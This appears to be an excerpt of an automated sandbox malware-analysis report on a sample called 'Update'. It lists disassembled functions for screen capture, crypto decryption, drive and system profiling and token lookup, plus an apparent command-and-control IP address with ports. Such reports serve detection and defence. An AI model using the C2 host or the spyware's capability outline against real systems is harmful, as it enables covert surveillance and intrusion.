                                                                                            • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                            • String ID: %4d.%2d.%2d-%2d:%2d:%2d$134.122.155.39$134.122.155.39$134.122.155.39$134.122.155.39$15091$15091$15092$15093$Console$IpDatespecial
                                                                                            • API String ID: 1511462596-1864220008
                                                                                            • Opcode ID: f9c1933146e498002c2ca5d6f3cc82641d8b6bbd3ea54ec459e5b19e7375fd79
                                                                                            • Instruction ID: 231bdc82aac215e0d13b1ef46bccbcd2e8c1300a39fc1cf1029af23914af9172
                                                                                            • Opcode Fuzzy Hash: f9c1933146e498002c2ca5d6f3cc82641d8b6bbd3ea54ec459e5b19e7375fd79
                                                                                            • Instruction Fuzzy Hash: B0D134B0544301AFD320EF61E889E2FB7A8FBC4705F140E1EF5648B2A4DB72854ADB56
                                                                                            Function 034EBC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351windowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetDesktopWindow.USER32 ref: 034EBC8F
                                                                                            • GetDC.USER32(00000000), ref: 034EBC9C
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 034EBCA2
                                                                                            • GetDC.USER32(00000000), ref: 034EBCAD
                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 034EBCBA
                                                                                            • GetDeviceCaps.GDI32(00000000,00000076), ref: 034EBCC2
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 034EBCD3
                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 034EBCF8
                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 034EBD26
                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 034EBD78
                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 034EBD8D
                                                                                            • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 034EBDA6
                                                                                            • SelectObject.GDI32(?,00000000), ref: 034EBDB4
                                                                                            • SetStretchBltMode.GDI32(?,00000003), ref: 034EBDC0
                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 034EBDCD
                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 034EBDE0
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 034EBE07
                                                                                            • _memset.LIBCMT ref: 034EBE7A
                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 034EBE97
                                                                                            • _memset.LIBCMT ref: 034EBEAF
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                            • DeleteObject.GDI32(?), ref: 034EBF23
                                                                                            • DeleteObject.GDI32(?), ref: 034EBF2D
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 034EBF39
                                                                                            • DeleteObject.GDI32(?), ref: 034EBFDF
                                                                                            • DeleteObject.GDI32(?), ref: 034EBFE9
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 034EBFF5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                            • String ID: ($6$gfff$gfff
                                                                                            • API String ID: 3293817703-713438465
                                                                                            • Opcode ID: 4bd93c0e8c55fb135cffc949ca1aaefb0d7a18a24bdc99837d5508b96090b101
                                                                                            • Instruction ID: a27f16c6103fcf14f917da0248c3c608b34f3bcb7c95ba0ee434a7b6aa3b5d75
                                                                                            • Opcode Fuzzy Hash: 4bd93c0e8c55fb135cffc949ca1aaefb0d7a18a24bdc99837d5508b96090b101
                                                                                            • Instruction Fuzzy Hash: AFD18BB1D00308AFDB10EFE9E988B9EBBB9FF48300F14452AF505AB250D771A945CB95
                                                                                            Function 6C376720 Relevance: 44.3, APIs: 22, Strings: 3, Instructions: 566encryptionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 963 6c376720-6c376728 964 6c37676d-6c37676f 963->964 965 6c37672a-6c376734 963->965 966 6c376736-6c376748 965->966 967 6c37674f-6c376766 call 6c38aa43 965->967 968 6c376770-6c37680e call 6c393a5e CryptAcquireContextW 966->968 969 6c37674a-6c37674d 966->969 967->964 975 6c376814-6c37684e 968->975 976 6c376e09-6c376e67 call 6c38d87e call 6c38d2b3 968->976 969->967 977 6c376850-6c376858 975->977 999 6c376e6a-6c376e8b call 6c376720 * 2 976->999 979 6c37685e-6c376874 CryptCreateHash 977->979 980 6c3769e8-6c376a08 CryptReleaseContext 977->980 982 6c376d1c-6c376d88 CryptReleaseContext call 6c38d87e call 6c38d2b3 979->982 983 6c37687a-6c376882 979->983 985 6c376a2f-6c376a38 980->985 986 6c376a0a-6c376a2d call 6c377d60 call 6c38f020 980->986 982->999 988 6c376884-6c376895 CryptHashData 983->988 989 6c37689b-6c3768a1 983->989 990 6c376a64-6c376a76 call 6c38f020 985->990 991 6c376a3a-6c376a5a call 6c38f020 * 2 985->991 1018 6c376a5d-6c376a62 986->1018 988->989 995 6c376d8d-6c376e02 CryptDestroyHash CryptReleaseContext call 6c38d87e call 6c38d2b3 988->995 996 6c3768a3-6c3768a6 989->996 997 6c3768ad-6c3768b3 989->997 1015 6c376a79-6c376a93 990->1015 991->1018 995->999 996->997 1003 6c3768b7-6c3768d6 call 6c377650 997->1003 1004 6c3768b5 997->1004 1028 6c3768e7-6c3768fe CryptHashData 1003->1028 1029 6c3768d8-6c3768e2 call 6c377840 1003->1029 1004->1003 1022 6c376a95-6c376aaf call 6c377d60 1015->1022 1023 6c376ab1-6c376aba 1015->1023 1018->1015 1037 6c376ae3-6c376aed call 6c38f020 1022->1037 1026 6c376aef-6c376afc call 6c38f020 1023->1026 1027 6c376abc-6c376ae2 call 6c38f020 1023->1027 1048 6c376aff-6c376b07 1026->1048 1027->1037 1035 6c376904-6c376929 CryptGetHashParam 1028->1035 1036 6c376c5a-6c376cb6 CryptDestroyHash CryptReleaseContext call 6c38d87e call 6c38d2b3 1028->1036 1029->1028 1040 6c37692f-6c37694a 1035->1040 1041 6c376cbb-6c376d17 CryptDestroyHash CryptReleaseContext call 6c38d87e call 6c38d2b3 1035->1041 1036->999 1037->1048 1043 6c376960 1040->1043 1044 6c37694c 1040->1044 1041->999 1051 6c376962-6c376969 1043->1051 1052 6c376980-6c3769a1 CryptGetHashParam CryptDestroyHash 1043->1052 1049 6c37694e-6c376951 1044->1049 1055 6c376b35-6c376b3a 1048->1055 1056 6c376b09-6c376b13 1048->1056 1049->1052 1058 6c3769d4-6c3769e3 call 6c38f5a0 1051->1058 1059 6c37696b-6c376978 call 6c377a40 1051->1059 1063 6c3769a7-6c3769cf call 6c377b50 1052->1063 1064 6c376c02-6c376c55 CryptReleaseContext call 6c38d87e call 6c38d2b3 1052->1064 1060 6c376b76-6c376b7e 1055->1060 1061 6c376b3c-6c376b46 1055->1061 1065 6c376b15-6c376b20 1056->1065 1066 6c376b2b-6c376b32 call 6c38aa43 1056->1066 1058->1049 1059->1052 1074 6c376b80-6c376b8d 1060->1074 1075 6c376baf-6c376bb4 1060->1075 1069 6c376b65-6c376b6f call 6c38aa43 1061->1069 1070 6c376b48-6c376b53 1061->1070 1063->977 1064->999 1077 6c376b26-6c376b29 1065->1077 1078 6c376e04 call 6c393a5e 1065->1078 1066->1055 1069->1060 1070->1078 1084 6c376b59-6c376b63 1070->1084 1088 6c376ba5-6c376bac call 6c38aa43 1074->1088 1089 6c376b8f-6c376b9a 1074->1089 1080 6c376bb6-6c376bc0 1075->1080 1081 6c376bee-6c376c01 1075->1081 1077->1066 1078->976 1091 6c376be4-6c376beb call 6c38aa43 1080->1091 1092 6c376bc2-6c376bd9 1080->1092 1084->1069 1088->1075 1089->1078 1095 6c376ba0-6c376ba3 1089->1095 1091->1081 1092->1078 1098 6c376bdf-6c376be2 1092->1098 1095->1088 1098->1091
                                                                                            APIs
                                                                                            • CryptAcquireContextW.ADVAPI32 ref: 6C376806
                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 6C37686C
                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6C37688D
                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6C3768F6
                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 6C376921
                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6C37698E
                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 6C376999
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Crypt$Hash$DataParam$AcquireContextCreateDestroy
                                                                                            • String ID: P~7l$g9;l$o8;l
                                                                                            • API String ID: 2113037386-3094558960
                                                                                            • Opcode ID: 5d89371fb86d8b78ac91747f0b09c49a7b46a5e44087dfae7729b0b941e4d65e
                                                                                            • Instruction ID: 16fd7de293013f1e940ef0a8b72872f42d4fb85b7dde90c5e905f87ce7fd981c
                                                                                            • Opcode Fuzzy Hash: 5d89371fb86d8b78ac91747f0b09c49a7b46a5e44087dfae7729b0b941e4d65e
                                                                                            • Instruction Fuzzy Hash: 6C226AB2E00218AFDF24CFA4CD55BEEBBB9EF49304F144158E405A7B40DB7999488FA5
                                                                                            Function 6C376EB0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 536encryptionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1102 6c376eb0-6c376f1b call 6c376520 1105 6c376f65-6c376fd6 call 6c376780 CryptAcquireContextW 1102->1105 1106 6c376f1d-6c376f2e 1102->1106 1112 6c3773c2-6c377425 call 6c38d87e call 6c38d2b3 1105->1112 1113 6c376fdc-6c37702c CryptImportKey 1105->1113 1106->1105 1107 6c376f30-6c376f62 call 6c377b50 call 6c38f020 1106->1107 1107->1105 1134 6c3775cc-6c3775d3 call 6c3726c0 1112->1134 1116 6c377032-6c377044 CryptSetKeyParam 1113->1116 1117 6c37742a-6c37748f CryptReleaseContext call 6c38d87e call 6c38d2b3 1113->1117 1121 6c377494-6c377502 CryptDestroyKey CryptReleaseContext call 6c38d87e call 6c38d2b3 1116->1121 1122 6c37704a-6c37706a CryptSetKeyParam 1116->1122 1117->1134 1121->1134 1126 6c377507-6c377572 CryptDestroyKey CryptReleaseContext call 6c38d87e call 6c38d2b3 1122->1126 1127 6c377070-6c37709e 1122->1127 1126->1134 1132 6c3770d3-6c3770d5 1127->1132 1133 6c3770a0-6c3770a2 1127->1133 1138 6c377115-6c377141 CryptDecrypt CryptDestroyKey CryptReleaseContext 1132->1138 1135 6c3775d8-6c3775f3 call 6c377640 call 6c376720 1133->1135 1136 6c3770a8-6c3770b1 1133->1136 1134->1135 1141 6c3770d7-6c3770e0 call 6c38aa0e 1136->1141 1142 6c3770b3-6c3770d1 call 6c38aa0e 1136->1142 1146 6c377147-6c377156 1138->1146 1147 6c377574-6c3775c9 call 6c38d87e call 6c38d2b3 1138->1147 1165 6c3770e2-6c377112 call 6c38f020 1141->1165 1142->1165 1153 6c377161 1146->1153 1154 6c377158-6c37715f 1146->1154 1147->1134 1160 6c3771a8-6c3771c4 1153->1160 1161 6c377163-6c37716a 1153->1161 1154->1160 1160->1134 1166 6c3771ca-6c3771cd 1160->1166 1162 6c37716c-6c377186 call 6c377a40 1161->1162 1163 6c377188-6c3771a6 call 6c38f5a0 1161->1163 1162->1160 1163->1160 1165->1138 1171 6c3771cf-6c3771e8 call 6c38f020 1166->1171 1172 6c3771ea-6c377210 1166->1172 1184 6c37725a-6c377262 1171->1184 1178 6c377212-6c377229 call 6c38aa0e 1172->1178 1179 6c37722b-6c377237 call 6c38aa0e 1172->1179 1186 6c377239-6c377258 call 6c38f020 1178->1186 1179->1186 1187 6c377264-6c37726e 1184->1187 1188 6c37729b-6c3772a0 1184->1188 1186->1184 1190 6c377291-6c377298 call 6c38aa43 1187->1190 1191 6c377270-6c377286 1187->1191 1192 6c3772a2-6c3772b6 1188->1192 1193 6c3772eb-6c3772f0 1188->1193 1190->1188 1197 6c3773bd call 6c393a5e 1191->1197 1198 6c37728c-6c37728f 1191->1198 1200 6c3772da-6c3772e4 call 6c38aa43 1192->1200 1201 6c3772b8-6c3772cf 1192->1201 1195 6c377336-6c37733b 1193->1195 1196 6c3772f2-6c377306 1193->1196 1206 6c37733d-6c377347 1195->1206 1207 6c377378-6c37737d 1195->1207 1203 6c377325-6c37732f call 6c38aa43 1196->1203 1204 6c377308-6c377313 1196->1204 1197->1112 1198->1190 1200->1193 1201->1197 1209 6c3772d5-6c3772d8 1201->1209 1203->1195 1204->1197 1213 6c377319-6c377323 1204->1213 1215 6c377367-6c377371 call 6c38aa43 1206->1215 1216 6c377349-6c377360 1206->1216 1211 6c3773a7-6c3773bc 1207->1211 1212 6c37737f-6c377389 1207->1212 1209->1200 1217 6c37739d-6c3773a4 call 6c38aa43 1212->1217 1218 6c37738b-6c377396 1212->1218 1213->1203 1215->1207 1216->1197 1220 6c377362-6c377365 1216->1220 1217->1211 1218->1197 1223 6c377398-6c37739b 1218->1223 1220->1215 1223->1217
                                                                                            APIs
                                                                                              • Part of subcall function 6C376520: CryptStringToBinaryA.CRYPT32(n7l,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6C376570
                                                                                              • Part of subcall function 6C376520: CryptStringToBinaryA.CRYPT32(n7l,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6C37660E
                                                                                            • CryptAcquireContextW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000008), ref: 6C376FCE
                                                                                            • CryptImportKey.ADVAPI32(00000000,00000208,00000014,00000000,00000000,00000000), ref: 6C377024
                                                                                            • CryptSetKeyParam.ADVAPI32(00000000,00000001,00000000,00000000), ref: 6C37703C
                                                                                            • CryptSetKeyParam.ADVAPI32(00000000,00000004,00000001,00000000), ref: 6C377062
                                                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?), ref: 6C377123
                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 6C37712E
                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6C377139
                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C3773FF
                                                                                              • Part of subcall function 6C38D2B3: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?), ref: 6C38D314
                                                                                              • Part of subcall function 6C3726C0: _strlen.LIBCMT ref: 6C372718
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Crypt$BinaryContextParamString$AcquireDecryptDestroyExceptionImportRaiseRelease___std_exception_copy_strlen
                                                                                            • String ID: 49;l$O9;l$Salt$ed__$o8;l
                                                                                            • API String ID: 1577403515-626284685
                                                                                            • Opcode ID: 9e5a80b253a55ca93addfd4c5158a03984231f92f774277d934134f528f7bf04
                                                                                            • Instruction ID: 8d7dcf576de4f544212789a676168a9e0b46af2ea1fbbee8f5b42f1d0c2eab05
                                                                                            • Opcode Fuzzy Hash: 9e5a80b253a55ca93addfd4c5158a03984231f92f774277d934134f528f7bf04
                                                                                            • Instruction Fuzzy Hash: CE22B1B2D112189FEB24CFA4CC55BEDBBB5EF45304F144158E805B7780DB799A488FA1
                                                                                            Function 034E80F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 034E8132
                                                                                            • lstrcmpiW.KERNEL32(?,A:\), ref: 034E8166
                                                                                            • lstrcmpiW.KERNEL32(?,B:\), ref: 034E8176
                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 034E81A6
                                                                                            • lstrlenW.KERNEL32(?), ref: 034E81B7
                                                                                            • __wcsnicmp.LIBCMT ref: 034E81CE
                                                                                            • lstrcpyW.KERNEL32(00000AD4,?), ref: 034E8204
                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 034E8228
                                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 034E8233
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                            • String ID: A:\$B:\
                                                                                            • API String ID: 950920757-1009255891
                                                                                            • Opcode ID: 609fb942140f7099b044aca51659424316474825e1f3de8faa7bb557f16b8591
                                                                                            • Instruction ID: 832e5a59d4f8b0c331383953f6f55889368261c8c262704be7d774b78de36c53
                                                                                            • Opcode Fuzzy Hash: 609fb942140f7099b044aca51659424316474825e1f3de8faa7bb557f16b8591
                                                                                            • Instruction Fuzzy Hash: 3741A571A01218DFDF20EF64DD84AAEB3B8EF44605F04459ADA0AA7240E771DA09CB98
                                                                                            Function 6C382576 Relevance: 18.7, APIs: 6, Strings: 4, Instructions: 1207COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $'$jIk$6
                                                                                            • API String ID: 0-3404073836
                                                                                            • Opcode ID: 35f1b1c52db16c6e3f64d4a4ec694b93578c340c020f66467ea23814d5f7b300
                                                                                            • Instruction ID: 48464fff08627d99c137b32883b0b99408b8a1b4ec3ceb1b861494a0a5eea2f8
                                                                                            • Opcode Fuzzy Hash: 35f1b1c52db16c6e3f64d4a4ec694b93578c340c020f66467ea23814d5f7b300
                                                                                            • Instruction Fuzzy Hash: 45C2CF71D122688BEB24CF64CC947EDBBB2BF45308F148298D4496BB81DB755AC8CF91
                                                                                            Function 6C382638 Relevance: 18.6, APIs: 6, Strings: 4, Instructions: 1140COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: $,$jIk$6
                                                                                            • API String ID: 4218353326-1611763776
                                                                                            • Opcode ID: 8cd76f8987b537ef669ef9a5906611c78bb7df2fae995952e9b95f217606d28d
                                                                                            • Instruction ID: 5294bf09166bb15428fbbe6beb5fdde9db0f6e0060d2c47455a468f5626dfd95
                                                                                            • Opcode Fuzzy Hash: 8cd76f8987b537ef669ef9a5906611c78bb7df2fae995952e9b95f217606d28d
                                                                                            • Instruction Fuzzy Hash: 3DB2DE71D122688BEB24CF24CC947EDBBB2BF45304F158298D449AB781EB755AC8CF91
                                                                                            Function 034E6790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 034E5320: InterlockedDecrement.KERNEL32(00000008), ref: 034E536F
                                                                                              • Part of subcall function 034E5320: SysFreeString.OLEAUT32(00000000), ref: 034E5384
                                                                                              • Part of subcall function 034E5320: SysAllocString.OLEAUT32(03505148), ref: 034E53D5
                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03505148,034E69A4,03505148,00000000,75BF73E0), ref: 034E67F4
                                                                                            • GetLastError.KERNEL32 ref: 034E67FE
                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 034E6816
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 034E681D
                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 034E683F
                                                                                            • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 034E6871
                                                                                            • GetLastError.KERNEL32 ref: 034E687B
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 034E68E6
                                                                                            • HeapFree.KERNEL32(00000000), ref: 034E68ED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                            • String ID: NONE_MAPPED
                                                                                            • API String ID: 1317816589-2950899194
                                                                                            • Opcode ID: 2a516ca0cc9df3e2c7e3db4ff27b97a682f203f9061cc16f7013a677ae164ea1
                                                                                            • Instruction ID: 67434f336aa9105af6887e2fd59a119c653bd0a67d7e03aba416cb1f00b8177f
                                                                                            • Opcode Fuzzy Hash: 2a516ca0cc9df3e2c7e3db4ff27b97a682f203f9061cc16f7013a677ae164ea1
                                                                                            • Instruction Fuzzy Hash: C741C7B5900218AFDB20EB61DD48FAF737CFB94705F00449EEA09AB140DA759E898F64
                                                                                            Function 034E6C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 034E6C8B
                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 034E6CAA
                                                                                            • _memset.LIBCMT ref: 034E6CE1
                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 034E6CF4
                                                                                            • swprintf.LIBCMT ref: 034E6D39
                                                                                            • swprintf.LIBCMT ref: 034E6D4C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                            • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                            • API String ID: 3202570353-3501811827
                                                                                            • Opcode ID: e81376292b5ec0e9a275961accc3c0f00b767e0bd791d9c44a009dcfac45e467
                                                                                            • Instruction ID: 068642291da1995f20869a8a264299fa0f04d76f9684be2a6d2c29a4fca49b2a
                                                                                            • Opcode Fuzzy Hash: e81376292b5ec0e9a275961accc3c0f00b767e0bd791d9c44a009dcfac45e467
                                                                                            • Instruction Fuzzy Hash: 99316EB6D0021C9BDB10CFE5DC45FEEB7B8FB48300F51421EE91AAB241E6756905CB94
                                                                                            Function 6C382870 Relevance: 16.8, APIs: 6, Strings: 3, Instructions: 1091COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: $,$jIk
                                                                                            • API String ID: 4218353326-2946808363
                                                                                            • Opcode ID: 244e826b53730e8afe0b589b1dfd61f310d8613557acbb67cbf33f9886bca423
                                                                                            • Instruction ID: 7d29ffc763425365a9bdd5e27b6df146c083a3e3c761990f94b3056f34ad2d2a
                                                                                            • Opcode Fuzzy Hash: 244e826b53730e8afe0b589b1dfd61f310d8613557acbb67cbf33f9886bca423
                                                                                            • Instruction Fuzzy Hash: 31A2DD71D122688BEB24CF24CC947EDBBB2BF45304F158298D449ABB81DB755AC8CF91
                                                                                            Function 6C382771 Relevance: 16.8, APIs: 6, Strings: 3, Instructions: 1091COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: $,$jIk
                                                                                            • API String ID: 4218353326-2946808363
                                                                                            • Opcode ID: a9f803e1d23a55aa4b01550d6211f01cb29dfec91cc19fbcd8f481ab92b39ead
                                                                                            • Instruction ID: d0f20b3b6b4ec76d29afb16042aa0d6f025ee763a8ad3a8e980b5d420617a277
                                                                                            • Opcode Fuzzy Hash: a9f803e1d23a55aa4b01550d6211f01cb29dfec91cc19fbcd8f481ab92b39ead
